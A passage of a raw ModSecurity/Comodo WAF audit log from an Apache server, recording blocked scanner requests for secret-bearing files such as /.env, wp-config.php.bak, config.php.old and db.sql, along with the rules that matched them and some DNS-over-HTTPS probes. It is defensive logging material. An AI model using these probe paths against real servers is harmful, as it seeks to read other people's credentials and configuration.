Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --c9be5304-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9be5304-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744959987883915 846 (- - -) Stopwatch2: 1744959987883915 846; combined=320, p1=276, p2=0, p3=0, p4=0, p5=44, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9be5304-Z-- --de89f96e-A-- [18/Apr/2025:14:06:28 +0700] aAH59Bk6uTiIdxrJEEQXkAAAAM0 103.236.140.4 59834 103.236.140.4 8181 --de89f96e-B-- GET /nuxt/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --de89f96e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de89f96e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744959988126721 753 (- - -) Stopwatch2: 1744959988126721 753; combined=268, p1=237, p2=0, p3=0, p4=0, p5=31, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de89f96e-Z-- --1395e674-A-- [18/Apr/2025:14:06:28 +0700] aAH59Bk6uTiIdxrJEEQXkQAAAMc 103.236.140.4 59836 103.236.140.4 8181 --1395e674-B-- GET /react/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --1395e674-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1395e674-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744959988369579 809 (- - -) Stopwatch2: 1744959988369579 809; combined=299, p1=264, p2=0, p3=0, p4=0, p5=34, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1395e674-Z-- --04aec923-A-- [18/Apr/2025:14:06:28 +0700] aAH59Fyj-eUTITfvHEWQGgAAAA8 103.236.140.4 59838 103.236.140.4 8181 --04aec923-B-- GET /db.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --04aec923-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04aec923-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744959988614265 2629 (- - -) Stopwatch2: 1744959988614265 2629; combined=941, p1=407, p2=498, p3=0, p4=0, p5=36, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04aec923-Z-- --664ec06b-A-- [18/Apr/2025:14:06:41 +0700] aAH6ATlhhbF_BYhFYTVGOAAAAEM 103.236.140.4 59974 103.236.140.4 8181 --664ec06b-B-- GET /config.php.old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --664ec06b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --664ec06b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744960001234111 3254 (- - -) Stopwatch2: 1744960001234111 3254; combined=959, p1=482, p2=444, p3=0, p4=0, p5=33, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --664ec06b-Z-- --74b84072-A-- [18/Apr/2025:14:06:43 +0700] aAH6AzlhhbF_BYhFYTVGOwAAAE4 103.236.140.4 60002 103.236.140.4 8181 --74b84072-B-- GET /wp-config.php.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --74b84072-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --74b84072-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744960003881264 841 (- - -) Stopwatch2: 1744960003881264 841; combined=337, p1=304, p2=0, p3=0, p4=0, p5=33, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74b84072-Z-- --92752067-A-- [18/Apr/2025:14:06:44 +0700] aAH6BDlhhbF_BYhFYTVGPAAAAEE 103.236.140.4 60008 103.236.140.4 8181 --92752067-B-- GET /.env.save HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --92752067-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92752067-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744960004124214 764 (- - -) Stopwatch2: 1744960004124214 764; combined=271, p1=237, p2=0, p3=0, p4=0, p5=34, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92752067-Z-- --321ae41e-A-- [18/Apr/2025:14:06:44 +0700] aAH6BDlhhbF_BYhFYTVGPgAAAFE 103.236.140.4 60014 103.236.140.4 8181 --321ae41e-B-- GET /web.config HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --321ae41e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --321ae41e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744960004367045 823 (- - -) Stopwatch2: 1744960004367045 823; combined=320, p1=284, p2=0, p3=0, p4=0, p5=35, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --321ae41e-Z-- --4a22d223-A-- [18/Apr/2025:14:06:44 +0700] aAH6BDlhhbF_BYhFYTVGPwAAAFU 103.236.140.4 60016 103.236.140.4 8181 --4a22d223-B-- GET /cp/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --4a22d223-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a22d223-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744960004609864 727 (- - -) Stopwatch2: 1744960004609864 727; combined=309, p1=278, p2=0, p3=0, p4=0, p5=31, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a22d223-Z-- --d1559874-A-- [18/Apr/2025:14:06:44 +0700] aAH6BDlhhbF_BYhFYTVGQAAAAEY 103.236.140.4 60018 103.236.140.4 8181 --d1559874-B-- GET /core/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --d1559874-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1559874-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744960004852577 643 (- - -) Stopwatch2: 1744960004852577 643; combined=274, p1=247, p2=0, p3=0, p4=0, p5=27, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1559874-Z-- --31753901-A-- [18/Apr/2025:14:06:45 +0700] aAH6BTlhhbF_BYhFYTVGQgAAAFA 103.236.140.4 60024 103.236.140.4 8181 --31753901-B-- GET /conf/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --31753901-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --31753901-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744960005095307 814 (- - -) Stopwatch2: 1744960005095307 814; combined=306, p1=270, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31753901-Z-- --58742843-A-- [18/Apr/2025:14:06:45 +0700] aAH6BTlhhbF_BYhFYTVGQwAAAEc 103.236.140.4 60026 103.236.140.4 8181 --58742843-B-- GET /server/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --58742843-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58742843-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744960005338021 713 (- - -) Stopwatch2: 1744960005338021 713; combined=314, p1=283, p2=0, p3=0, p4=0, p5=31, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58742843-Z-- --12936443-A-- [18/Apr/2025:14:06:45 +0700] aAH6BTlhhbF_BYhFYTVGRQAAAEw 103.236.140.4 60032 103.236.140.4 8181 --12936443-B-- GET /crm/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --12936443-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12936443-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744960005580856 873 (- - -) Stopwatch2: 1744960005580856 873; combined=393, p1=359, p2=0, p3=0, p4=0, p5=34, sr=145, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12936443-Z-- --8b46db00-A-- [18/Apr/2025:14:35:48 +0700] aAIA1Fyj-eUTITfvHEWSvwAAAAM 103.236.140.4 40126 103.236.140.4 8181 --8b46db00-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.211.42.174 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.211.42.174 X-Forwarded-Proto: https Connection: close Content-Length: 37 content-type: application/dns-message accept: application/dns-message user-agent: Chrome --8b46db00-C-- itest meshtrustwork --8b46db00-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b46db00-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1744961748407070 4425 (- - -) Stopwatch2: 1744961748407070 4425; combined=2825, p1=638, p2=2091, p3=29, p4=33, p5=33, sr=128, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b46db00-Z-- --e0db6d58-A-- [18/Apr/2025:14:39:11 +0700] aAIBn1yj-eUTITfvHEWTFQAAABg 103.236.140.4 40908 103.236.140.4 8181 --e0db6d58-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 159.89.127.165 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 159.89.127.165 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --e0db6d58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0db6d58-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744961951015122 830 (- - -) Stopwatch2: 1744961951015122 830; combined=326, p1=293, p2=0, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0db6d58-Z-- --bcc9e50b-A-- [18/Apr/2025:15:30:33 +0700] aAINqTpR4B6O-aqWibMwPAAAAIU 103.236.140.4 52652 103.236.140.4 8181 --bcc9e50b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 157.245.232.123 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 157.245.232.123 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --bcc9e50b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bcc9e50b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744965033292528 758 (- - -) Stopwatch2: 1744965033292528 758; combined=302, p1=265, p2=0, p3=0, p4=0, p5=37, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bcc9e50b-Z-- --bbdc0503-A-- [18/Apr/2025:15:59:53 +0700] aAIUiTpR4B6O-aqWibMzCgAAAIk 103.236.140.4 34148 103.236.140.4 8181 --bbdc0503-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.245.61.81 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.245.61.81 X-Forwarded-Proto: https Connection: close Content-Length: 28 content-type: application/dns-message accept: application/dns-message user-agent: Chrome --bbdc0503-C-- ógooglecom --bbdc0503-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --bbdc0503-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1744966793493372 4365 (- - -) Stopwatch2: 1744966793493372 4365; combined=2557, p1=598, p2=1875, p3=27, p4=31, p5=26, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bbdc0503-Z-- --6883987e-A-- [18/Apr/2025:16:50:10 +0700] aAIgUlyj-eUTITfvHEWktwAAAA8 103.236.140.4 39490 103.236.140.4 8181 --6883987e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.69.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.69.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; KYF39 Build/100.0.2039; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 Accept-Charset: utf-8 --6883987e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6883987e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744969810448148 791 (- - -) Stopwatch2: 1744969810448148 791; combined=334, p1=295, p2=0, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6883987e-Z-- --8062b765-A-- [18/Apr/2025:16:50:43 +0700] aAIgcxk6uTiIdxrJEEQmawAAAMs 103.236.140.4 39616 103.236.140.4 8181 --8062b765-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.69.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.69.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.71 Safari/537.36 OPR/63.0.3368.17 (Edition beta) Accept-Charset: utf-8 --8062b765-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8062b765-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file 